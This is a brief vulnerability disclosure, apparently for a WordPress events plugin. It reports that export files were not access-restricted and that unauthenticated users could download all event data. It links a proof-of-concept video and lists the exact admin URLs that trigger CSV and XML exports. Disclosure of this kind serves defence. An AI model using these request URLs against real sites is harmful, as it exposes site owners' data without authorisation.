The plugin did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.
https://drive.google.com/file/d/1lLEXDyPp4LcKoCOqYS7A-0Yg_pIQD-ND/view?usp=sharing
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml